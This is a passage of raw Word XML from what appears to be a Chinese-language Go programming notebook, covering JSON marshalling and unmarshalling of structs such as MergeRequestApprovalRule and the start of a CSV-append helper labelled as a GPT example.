    <w:p w14:paraId="3DD4C027" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>type Server struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DC7E5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ServerName string `json:"serverName,string"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E8D310" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ServerIP   string `json:"serverIP,omitempty"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF5CA66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C62B718" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>type Serverslice struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7217004A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Servers []Server `json:"servers"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7772F85D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AEEDC4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E433EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    var s Serverslice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA8B5A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    s.Servers = append(s.Servers, Server{ServerName: "Guangzhou_Base", ServerIP: "127.0.0.1"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454DCE77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    s.Servers = append(s.Servers, Server{ServerName: "Beijing_Base", ServerIP: "127.0.02"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F67C4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    b, err := json.Marshal(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0B8458" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E0ECCD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        fmt.Println("JSON ERR:", err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE93D3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DEC23A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    fmt.Println(string(b))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCDCA9D" w14:textId="490B88D0" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E970384" w14:textId="5CB33279" w:rsidR="00857332" w:rsidRDefault="00857332" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A42F16" w14:textId="4D355EE7" w:rsidR="003473F5" w:rsidRDefault="003473F5" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析无键名的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列表到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ED207D" w14:textId="0061583A" w:rsidR="003473F5" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>先定义</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>列表中单</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>字段结构体</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MergeRequestApprovalRule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585CE78E" w14:textId="77777777" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>type MergeRequestApprovalRule struct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2C1783" w14:textId="77777777" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>ID                   int                  `json:"id"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598EF021" w14:textId="77777777" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Name                 string               `json:"name"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9EFF6C" w14:textId="77777777" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>RuleType             string               `json:"rule_type"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB9BF7A" w14:textId="77777777" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>EligibleApprovers    []*BasicUser         `json:"eligible_approvers"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F3A514" w14:textId="77777777" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>ApprovalsRequired    int                  `json:"approvals_required"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7310D08C" w14:textId="77777777" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>SourceRule           *ProjectApprovalRule `json:"source_rule"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671D745B" w14:textId="77777777" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Users                []*BasicUser         `json:"users"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7005BDAB" w14:textId="77777777" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Groups               []*Group             `json:"groups"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274A3791" w14:textId="77777777" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>ContainsHiddenGroups bool                 `json:"contains_hidden_groups"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6542859F" w14:textId="77777777" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Section              string               `json:"section"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440D1DB2" w14:textId="77777777" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>ApprovedBy           []*BasicUser         `json:"approved_by"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463915F2" w14:textId="77777777" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Approved             bool                 `json:"approved"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7109E2D0" w14:textId="3AFA88C2" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385D428F" w14:textId="31825EA5" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7175B4E9" w14:textId="309BD9DD" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>创建变量，方便未来传递该变量的指针</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649A8562" w14:textId="3E825C9B" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E84A85">
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>approval_rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84A85">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[]MergeRequestApprovalRule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AA4829" w14:textId="6601C51B" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF38422" w14:textId="6A122596" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里是从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>lient.Do()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>resp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E43D01" w14:textId="77777777" w:rsidR="0005393B" w:rsidRDefault="0005393B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>response := resp.Response.Body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131B5B83" w14:textId="3140C816" w:rsidR="000E2912" w:rsidRDefault="0005393B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>body, err := io.ReadAll(response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB3CABC" w14:textId="5538CFE5" w:rsidR="000E2912" w:rsidRDefault="000E2912" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F8C6D50" w14:textId="1252C85F" w:rsidR="00E84A85" w:rsidRDefault="00E84A85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>son.Unmarshal</w:t>
      </w:r>
      <w:r w:rsidRPr="00E84A85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>解析列表到变量中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E5DC85" w14:textId="668D81D6" w:rsidR="003473F5" w:rsidRDefault="003403C2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003403C2">
        <w:t>err = json.Unmarshal(body, &amp;approval_rules)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6536A0" w14:textId="269CBAC9" w:rsidR="00240234" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCDD820" w14:textId="26165E6E" w:rsidR="00480CEC" w:rsidRDefault="00334125" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D15D58A" w14:textId="77777777" w:rsidR="00480CEC" w:rsidRDefault="00480CEC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="078741AE" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准库中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>encoding/csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包来完成这个任务。以下是一个简单的函数，它接受一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[]string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的参数并将这个切片的内容追加到一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEF52C0" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A4685D5" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，确保你已经在你的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的开始处导入了必要的包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E53FF0" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FD2B7ED" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E6BB7D" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>"encoding/csv"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB393AF" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>"os"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7335825A" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D6B878" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="566FC482" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，你可以定义你的函数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6427D538" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="672BACF8" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func appendToCSV(data []string, filename string) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119787F4" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>打开文件，准备追加数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4757A8" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>file, err := os.OpenFile(filename, os.O_WRONLY|os.O_CREATE|os.O_APPEND, 0644)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FAB4D4" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F7F8F8" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>return err</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1416EE4E" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC0E041" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>defer file.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5868071C" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E5B3C9" w14:textId="77777777" w:rsidR="00FA1227" w:rsidRPr="004B4159" w:rsidRDefault="00FA1227" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
      <w:r w:rsidRPr="004B4159">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>CSV writer</w:t>
      </w:r>
    </w:p>
